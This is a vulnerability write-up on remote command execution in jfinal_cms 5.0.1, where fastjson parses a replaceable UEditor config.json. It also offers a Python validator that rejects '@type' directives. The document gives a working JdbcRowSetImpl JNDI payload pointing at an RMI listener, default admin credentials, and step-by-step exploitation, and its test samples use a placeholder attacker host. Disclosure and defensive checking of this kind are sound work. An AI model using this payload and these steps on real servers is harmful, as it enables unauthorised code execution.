Vulnerability summary
A remote command execution vulnerability exists in jfinal_cms 5.0.1: the bundled UEditor component parses WEB-INF/classes/config.json with fastjson 1.2.28, and that file can be replaced through the backend template manager, so an authenticated backend user can trigger fastjson deserialization and run arbitrary commands.
JDK version requirements:
jfinal_cms version:5.0.1
fastjson version:1.2.28

Vulnerability reproduction
JDK version used in the test: JDK 8u101 (the rmi:// reference relies on JNDI remote class loading, which later JDK 8 updates disable by default, so a newer JDK may not reproduce as-is)
On Kali, run JNDIExploit to start the RMI and LDAP services:
https://github.com/feihong-cs/JNDIExploit
Replace the rmi:// or ldap:// address in the payload with the address of your own listener:
{
  "a": {
    "@type": "java.lang.Class",
    "val": "com.sun.rowset.JdbcRowSetImpl"
  },
  "b": {
    "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": "rmi://192.168.248.128:1099/6dxg2x",
    "autoCommit": true
  }
}

Create a config.json file and paste the payload into it.
Log in to the backend management system and open template management
(default credentials: admin/admin123)
Click config.json
Click Replace file
Upload the config.json containing the payload created above
Visit /ueditor (http://localhost:8080/jfinal_cms/ueditor in the test setup); the replaced config file is parsed on that request, the JNDI lookup fires, and the command executes, popping up the calculator
Vulnerability analysis
com.jflyfox.component.controller.Ueditor
The index method of the /ueditor route instantiates ActionEnter.

com.baidu.ueditor.ActionEnter#ActionEnter
The ActionEnter constructor instantiates ConfigManager.

com.baidu.ueditor.ConfigManager#ConfigManager
The ConfigManager constructor calls initEnv().

com.baidu.ueditor.ConfigManager#initEnv
initEnv() reads the configuration file and passes its content to JSONObject.parseObject. The file content is attacker-controllable, so replacing it with the payload is enough to reach fastjson's @type handling.

com.baidu.ueditor.ConfigManager
The file read is WEB-INF/classes/config.json. Any file upload or file replacement function in the backend that can overwrite this file (here, template management) is enough to trigger fastjson deserialization of the payload; the next request to /ueditor does the rest.
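Since the only thing the attacker controls is the text of config.json, the natural place for a compensating check is the file-replace path. The script below is an added example written for this page, not code from jfinal_cms, UEditor or fastjson: it decodes a candidate config.json and refuses it if any "@type" directive appears anywhere in the tree (a UEditor configuration never needs one), labels the two classes the payload above uses, and recognises the {"@type":"java.lang.Class","val":...} object that fastjson versions before 1.2.48 use as a cache-priming step. The sample inputs are constructed; attacker.example is a placeholder host.

```python
import json

# Constructed sample inputs (not files taken from jfinal_cms). PAGE_PAYLOAD has the
# shape of the config.json payload shown in this issue, with a placeholder RMI host.
PAGE_PAYLOAD = (
    '{ "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" },'
    ' "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl",'
    ' "dataSourceName":"rmi://attacker.example:1099/obj", "autoCommit":true } }'
)
# A benign, UEditor-style configuration (constructed; keys resemble the real file).
CLEAN_CONFIG = (
    '{ "imageActionName": "uploadimage", "imageFieldName": "upfile",'
    ' "imageMaxSize": 2048000, "imageAllowFiles": [".png", ".jpg"] }'
)
# Same directive as the payload, but the '@' is written as a JSON escape. A raw-text
# scan for "@type" misses it; any JSON parser (fastjson included) decodes it to '@type'.
ESCAPED_PAYLOAD = (
    '{ "a":{ "\\u0040type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" } }'
)

# Classes named in this issue. Detection does not depend on this set; it only labels hits.
KNOWN_GADGETS = {"java.lang.Class", "com.sun.rowset.JdbcRowSetImpl"}


def find_type_directives(node, path="$"):
    """Walk a decoded JSON tree and return every (json_path, class_name) carried by
    an '@type' key, at any depth, including inside arrays."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "@type":
                hits.append((path, str(value)))
            else:
                hits.extend(find_type_directives(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            hits.extend(find_type_directives(value, f"{path}[{index}]"))
    return hits


def uses_class_cache_priming(node):
    """True if some object is {"@type":"java.lang.Class","val":"<class>"}. That is the
    shape the payload above uses: fastjson (< 1.2.48) loads the named class into its
    type cache while deserializing java.lang.Class, and the later @type lookup of the
    same class is then served from that cache before the deny list is consulted."""
    if isinstance(node, dict):
        if node.get("@type") == "java.lang.Class" and "val" in node:
            return True
        return any(uses_class_cache_priming(v) for v in node.values())
    if isinstance(node, list):
        return any(uses_class_cache_priming(v) for v in node)
    return False


def analyze_config(text):
    """Decide whether a candidate config.json may be accepted by a file-replace
    handler. Decode first so escaped keys are normalised, then reject the file if it
    contains any '@type' directive."""
    try:
        doc = json.loads(text)
    except ValueError as exc:
        return {"accept": False, "error": f"not valid JSON: {exc}",
                "type_directives": [], "known_gadgets": [], "cache_priming": False}
    hits = find_type_directives(doc)
    return {
        "accept": not hits,
        "error": None,
        "type_directives": hits,
        "known_gadgets": [cls for _, cls in hits if cls in KNOWN_GADGETS],
        "cache_priming": uses_class_cache_priming(doc),
    }


if __name__ == "__main__":
    for name, text in [("clean", CLEAN_CONFIG), ("payload", PAGE_PAYLOAD),
                       ("escaped", ESCAPED_PAYLOAD)]:
        print(name, analyze_config(text))
```

Checking after JSON decoding is the point of the escaped sample: the raw text never contains the string "@type", yet the parser, like fastjson's lexer, turns \u0040type into that key. This check is a compensating control for the upload path; the underlying fixes remain not letting the web backend write into WEB-INF/classes and moving off a fastjson version that honours @type from untrusted input.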